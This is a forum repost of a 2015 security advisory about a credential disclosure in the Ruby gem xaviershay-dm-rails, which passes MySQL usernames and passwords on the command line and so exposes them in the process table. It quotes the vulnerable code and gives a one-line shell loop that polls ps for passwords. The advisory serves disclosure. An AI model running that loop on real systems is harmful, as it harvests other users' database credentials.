Jump to content
Aerosol

xaviershay-dm-rails 0.10.3.8 MySQL Credential Disclosure

By Aerosol, in Exploituri

Recommended Posts

Aerosol Newbie

Aerosol

Posted
Posted 

Title: xaviershay-dm-rails v0.10.3.8 mysql credential exposure
Author: Larry W. Cashdollar, @_larry0
Date: 2015-02-17
Download Site: https://rubygems.org/gems/xaviershay-dm-rails
Vendor: Martin Gamsjaeger, Dan Kubb
Vendor Notified: 2015-02-17
Vendor Contact: notreal [at] rhnh.net
Description: This gem provides the railtie that allows datamapper to hook into rails3 and thus behave like a rails framework component. Just like activerecord does in rails, dm-rails uses the railtie API to hook into rails. The two are actually hooked into rails almost identically.
Vulnerability:
The problem is with the execute function exposing the user credentials to the process table.

Lines 169 - 177 in /datamapper/dm-rails/blob/master/lib/dm-rails/storage.rb:

   def execute(statement)
          system(
            'mysql',
            (username.blank? ? '' : "--user=#{username}"),
            (password.blank? ? '' : "--password=#{password}"),
            '-e',
            statement
          )
        end

OSVDB:118579
Exploit Code:
  • $ while (true) do ps -ef |grep [p]assword; done
Advisory: http://www.vapid.dhs.org/advisory.php?v=115

Source

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...